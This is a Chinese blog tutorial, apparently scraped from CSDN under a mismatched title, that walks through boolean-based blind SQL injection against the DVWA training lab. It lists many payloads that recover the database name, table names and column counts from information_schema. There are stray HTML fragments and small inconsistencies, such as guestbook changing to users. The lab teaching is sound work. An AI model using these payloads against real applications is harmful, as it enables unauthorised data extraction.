sql server 从左侧截取不固定长度_sql盲注布尔注入

最新推荐文章于 2022-10-04 18:51:26 发布
最新推荐文章于 2022-10-04 18:51:26 发布
阅读量223 收藏
点赞数
文章标签: sql server 从左侧截取不固定长度
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39890289/article/details/111377658
版权

sql盲注:从执行结果上无法从页面上看到之行结果

无法分析sql执行过程,甚至无法得知是否运行

盲注相对复杂

一.在安全级别为LOW基于布尔的盲注-注入点及类型判断

dbe8869b8dfd6fb8abb849f4a7068819.png

1.php代码分析

96eda2d12195317d44502da8266ab3d8.png

先检查一下User Id 是否为空,如果为空执行下列操作,先赋值id,之后再数据库中查询数据,将结果输出给result,将结果集中行的数量,如果大于0,输出User ID存在数据库中,否则发送数据包头并输出不存在数据库中,最后关闭函数。

2.函数分析

mysqli_num_rows()函数

9ae10eee9c757ad228216eed6db0f123.png

header()函数

4302302a3812fc20969bc54b8970265c.png

aed5ee5092de8d416dbfc52dfc13915c.png

3.实际操作

(1)判断是否存在注入

5ccc1e68b13bdff9e41945d497965852.png

出现这句话就是有注入点

(2)判断注入是字符型还是数字型

805a321ce802b1a1860cf8706a5375d8.png

8a1adb5d5fe211fdd9ebb7ec05de7be2.png

都能查到说明不是数字型

e843bc1d738a5647adb0e5378f9d1f67.png

26e817648b0ada37b576411940065bff.png

说明是字符型的

二.猜解数据库名

1.猜解数据库名的长度

1' and length(database())=1#

f597f33cd7db444770b8b50242682722.png

1' and length(database())=2#

f597f33cd7db444770b8b50242682722.png

1' and length(database())=3#

f597f33cd7db444770b8b50242682722.png

1' and length(database())=4#

41abd7fa3564b9e604440f4a814b6bd8.png

显示存在

说明数据库长度为4

2.使用二分法逐个字符猜解数据库名

(1)二分查找

(2)字符串截取函数

(3)ascii码对比

     Ascii()返回某个字符的ascii码值

     65-90是A-Z

     97-122是a-z

substr()字符串截取函数

     substr(database(),1,1)截取数据库名字,返回数据库名字的第一个字符

(第一个1是从第1个字符开始,第二个1是截取一个字符)

substr(database(),2,1)返回第二个字符

(1)1' and ascii(substr(database(),1,1))>97#判断最小英文字符

04b935a58f2106949554331f00c6c71e.png

(2)1' and ascii(substr(database(),1,1))<122#< span="">

9908f9c08b9e80de54e0cb36022b7530.png

所以是从b开始的,然后开始不断地尝试判断是什么字符

二分查找:a-z 总共26个字符,13,strat 97+13 109

(3)1' and ascii(substr(database(),1,1))>109#

       b366dca156cb73d8012f15646a632009.png

13个字符取一半6

97+6 103

1' and ascii(substr(database(),1,1))>103#

d83df717adec395fe51aa71d69ece48f.png

6取一半是3

97+3  100

1' and ascii(substr(database(),1,1))>100#

a445afda9c5bd5ad2a69ea39dd78cde4.png

3取一半是1

97+1   98

1' and ascii(substr(database(),1,1))>98#

476a91be35c69eb9d6669ae6151c9d4b.png

所以大于98

1' and ascii(substr(database(),1,1))>99#

b5b237a9560d2a395e2e72f68f620b9f.png

所以大于99,但不大于100

所以说第一个字符的ascii是100,d的ascii码是100,所以第一个字符是d

其他字符依次猜测,结果是dvwa

3猜一下数据库有几个表

1' and (select count(table_name) from information_schema.tables where table_schema=database())#

062c5635e29025824807e9235148f8d9.png

因为是盲注需要等量分析一下表的数量是几

1' and (select count(table_name) from information_schema.tables where table_schema=database())=1#

1eca01f5a3bc3cc065fcae5e060e270c.png

1' and (select count(table_name) from information_schema.tables where table_schema=database())=2#

bf9767366c9644c10762e19a5ea5bd08.png

说明表的数量是2

4猜解每个表的长度(1’ and length(substr(查询语句,1))==1#)

查询语句:select table_name from information_schema.tables where table_schema=database() limit 0,1    正常显示两条记录,但这只显示第一条,此语句作用:只显示数据库下第一个表的表名

Limit 0,1的0是从第1条记录开始,1是显示的记录的条数

substr((select table_name from infromation_schema.tables where table_schema=database() limit 0,1),1)

总的sql语句是:1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1#

db2bd40bfbea90f7a53862a385b8a5f5.png

经过不断尝试,得知表名长度为9

1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9#

e1bdae423b231831bc52bac02159ec0c.png

5逐一猜一下表名(利用二分法)

ascii():返回单个字符的adcii码表

substr(返回表名,1,1):把表名从第1个字符开始截取,截取1个字符

返回表明的语句:(select table_name from information_schema.tables where table_schema=database() limit 0,1)

substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)

ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))

所以sql语句为

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>=97#

dae2089826dca25081160a8138a5620a.png

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<122#< span="">

10ee71005cf63d0b3711032c9e8fb30a.png

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>109#

0ac13cdc1bb7d52669c348b67daf1b05.png

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>103#

7aa01b854e05d70c0c45d35493bc9fc2.png

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100#

e74fc2455b3c86f3eb53c624a62dcd4b.png

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>98#

f9e3f5eebcc34f830d90be4347e25e8d.png

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>99#

97e3a7d6135c4e7f3c91f15381cd4833.png

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<109#< span="">

4069789257319c82ee899aff8f445cdb.png

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103#< span="">

bc18920d213e27388463e618d9213d67.png

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103#< span="">

127b91667adc5a67a58230a3e0ec353d.png

通过试验得知表名第一个ascii值是103,即表名第一个字母为g,又知道表名长度为9,所以猜测是(guestbook),最终证明确实如此

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=103#

9f7a660545391ebf0c6f678141b63af5.png

d6a5bfd5bf71536e3baaabf0d3fe107c.png

6.猜字段数量

1' and (select count(column_name) from information_schema.columns where table_name='guestbook')=1#

455a23d4ca5986dc6de86e0e40e71868.png

1' and (select count(column_name) from information_schema.columns where table_name='guestbook')=3#

c9327554ddd37b1e4c97869008a75128.png

所以字段数量为3

7.猜每个字段的长度

1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=1#

65a230fa2cccf265fc8feb7356b79dee.png

1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=7#

366b60c4535402416ee65bdf7d189f7d.png

所以字段长度为7

8  猜字段名

9  猜数据

本文介绍的是SQL盲注,欢迎大家点赞和收藏,您的支持是我创作的最大动力!

weixin_39890289
关注
《网络安全自学教程》- SQL注入布尔盲注原理+步骤+实战操作
wangyuxiang946的博客
05-13 4840
这篇文章为大家解析布尔盲注实现原理,结合实战案例讲解布尔盲注使用步骤
sqlserver数据库布尔盲注_dba安全测试必备:SQL SERVER数据库手工延时盲注语句
weixin_42517807的博客
12-24 462
假设存在一个PHP+SQL SERVER的环境,存在POST注入,只能进行延时盲注,存在防火墙,Sqlmap能够绕过,但不能注入,手工注入语句如下:0x1:判断是否存在注入:#inject为注入点,--OwlXXpFshm%0A绕过WAF,替换空格为注释+回车#如果存在注入,返回的数据包将延时5秒以上inject';WAITFOR--OwlXXpFshm%0ADELAY--OwlXXpFshm%0...
sql server左侧截取固定长度_SQL注入学习笔记2
weixin_39883440的博客
12-17 427
我们来继续SQL注入的学习,第一次的笔记我们学习的是SQL union联合注入和报错注入,这两种注入都有明显的数据回显。也就是说,我们通过注入让数据库的信息回显在页面中。在真实的渗透过程中,有时候我们碰到的网站常常不会输出这些信息,而遇到这种不回显的页面,我们又怎么进行SQL注入呢?这次笔记的介绍的就是两种不回显的SQL注入布尔注入与时间注入布尔注入布尔值就是用于判断真和假的一个逻辑...
sql server左侧截取固定长度_SQL注入笔记(二)
weixin_39850143的博客
12-03 514
“个人学习笔记(二)”SQL注入盲注对于页面没有直接回显,后台对报错进行了屏蔽,无法通过根据错误信息来进行注入的判断,就需要使用盲注。基于布尔盲注只返回True和False两种类型页面。利用页面返回不同,逐个猜解数据。函数说明截取字符串函数•Mid(str,start,len) 取str中从下标start开始的,长度为len的字符串,len可省略,表示从头取到尾•Substr(str...
SQL截取固定长度(有关键字符)的字符串
jingxuan84的专栏
09-27 3554
比如 ERPCustomInfo 表中某条记录的QuYu字段中有如下字符: 广东省珠海市高栏港区  Select Substring(QuYu,0,CHARINDEX('省',QuYu)+1) as 省名 FROM ERPCustomInfo  --获取到广东省  Select Substring(QuYu,CHARINDEX('省',QuYu)+1,CHAR
SQL登录,简单增删改查
qq_43198727的博客
09-16 682
数据库 链接本地数据库 mysql - uroot; 设置链接端的编码为utf-8 set names utf8; //set 设置 在sql语句中不用写 - 先丢弃在创建 xz 学子,在做练习的时候肯定不止一次要运行一次建库,防止同名的库创建不出来报错. drop database if exites xz; //drop 丢弃,exites 存在。斜杠注释 创建数据库设置编码格式utf-8; creata database xz charset = utf8; 进入数据库; use 创建一个名为xs
sql server左侧截取固定长度_SQL复杂查询
weixin_39921504的博客
12-17 637
视图数据库中的表存放的是实际的数据,视图存放的是sql语句使用视图时会运行视图里的sql语句并创建出一张临时表,这张临时表会在客户端与数据库连接断开时自动删除创建视图create view 视图名称(视图列名1,视图列名2,...) as select 查询语句;sql查询语句中的列名要与创建视图语句中的列名顺序一致视图的作用创建视图之后,就可以在from语句中使用视图名称来代替表的名称,通过简单...
sqlserver数据库布尔盲注_SQL注入实战之盲注篇(布尔、时间盲注
weixin_32179749的博客
01-14 997
首先还是写一下核心的语句吧。information_schemaschemata(schema_name)tables(table_schema,table_name)columns(table_schema,table_name,column_name)select schema_name from information_schema.schemata;select table_name fr...
SQL注入布尔盲注
最新发布
qq_45557130的博客
10-04 789
sql注入布尔盲注
sqlserver数据库布尔盲注_Sqli labs系列-less-8 基于布尔盲注注入
weixin_34959044的博客
01-16 117
第八关,还是上一关一样,我们无法得出数据的,不过如果用盲注的手段,我还是可以猜测出数据的。盲注具体是啥意思,我就不说了,玩这个都直达,常见的盲注,一个基于布尔值的盲注,一个是基于时间上的盲注。这里我们用到的是基于布尔盲注,当然,这章,我们只是利用这一关,让大家更深入的理解的什么是基于布尔值的盲注。在我自己的学习中,我是很讨厌看文字的,同时如果看图的话,还能看的进心里,同时也好理解,但是很多人的图...
sql 字符位置不固定/长度固定时字符切片 substring charindex
weixin_43609275的博客
01-23 1888
目的:返回新管理员的名字 SUBSTRING(string, start, length) 在string中,从start开始提取长度为length的字符串 三个参数都必须要有 CHARINDEX(substring, string, start) 在string中从start开始寻找substring 前两个参数必有,start可选 --- 表:db_user --- 列:userSta...
oracle 截取非数字,如何在不规则字段长度截取数字
weixin_33961375的博客
04-04 482
具体如下:SQL> with tmp as2(3 select '110042319' str from dual4 union all5 select '210046014此运单已提交!' str from dual6 union all7 select '210046043' str from dual8 union all9 select ...
SQL注入布尔盲注入(一)
skynet_x的博客
11-05 973
关于函数substring用法: eg:substring(appache,1,3) 结果:app 即从第一位开始截取三位 以sqli-labs-master中第八关为例进行演示: 1.判断数据库名长度 http://172.16.32.128/sqli-labs-master/Less-8/?id=1' and length(database())=8 --+ 当长度为9时页面返回值为假,...
sqlserver数据库,使用substring函数截取固定位置字符串。
焦糖橙子
07-19 3421
sqlserver数据库,使用substring函数截取固定位置字符串。 当我们在向页面写入数据库查询出来的数据的时候,有一些不必要的字符串,相信大家肯定会在后台的java代码中进行处理再返回到页面上。今天遇到一个无法使用后台处理的功能,只能使用sql语句来进行处理。今天记录一下,方便以后查询。 上面是查询出来的数据。现在想要将里面的姓名取出来,但是使用截取的话,每个人的姓名长度可能会不一样,...
sqlserver数据库布尔盲注_sql注入学习记录(3)-基于布尔SQL盲注
weixin_29455479的博客
12-24 308
上次说到了sql注入中的字符型和数字型的基本的方法,也是最简单的。但是有时候如果注入的时候没有详细的内容,只回显有或者没有,那么就可以使用布尔盲注如果没有回显,也可以尝试基于时间延迟的盲注如果没有关闭报错信息,也可以尝试基于报错的盲注基于布尔SQL盲注我们可以利用逻辑判断进行截取字符串相关操作left(database(),1)>'s'表示从database()左侧截取前1为大于's'asc...
字符串截取
qq_42129143的博客
05-22 296
1、slice() 第一个参数是开始位置,第二个参数是结束位置的后一位,截取出来的字符串长度是第二个参数和第一个参数的差, 如果参数是负数,则将该值加上字符串长度转为正值,如果第一个参数大于第二个参数,返回空字符串2、substring 第一个参数是开始位置,第二个参数是结束位置的后一位,截取出来的字符串长度是第二个参数与第一个参数的差 如果参数是负数,则将该值转换...
DVWA盲注详解
qq_45788625的博客
04-18 6641
low等级DVWA盲注详解
sql注入练习之bool盲注
windStudyer的专栏
05-22 1154
1.bool盲注的原理 以根据返回页面判断条件真假的注入 判断方式: 通过长度判断 length(): length(database())>=x 通过字符判断 substr():substr(database() ,1,1)= 's' 通过 ascII 码判断:ascii():ascii(substr(database(),1,1)) =x 2.bool盲注相关的函数 3.实验-bool盲注 实验环境:phpstudy+apache+mysql+pikachu 3.1判断注入
SQL如何从字符串截取指定字符(LEFT、MID、RIGHT三大函数)
web15185420056的博客
09-12 2834
深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《Java开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
SQL注入攻防:盲注与数据库暴库实战解析
本文主要探讨了SQL注入攻击中的盲注技巧和如何绕过常见的防护机制,结合具体的SQL语句实例,旨在帮助读者深入理解和防范这种网络安全威胁。 在Web应用程序开发中,SQL注入是一种常见的安全漏洞,攻击者可以利用它来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值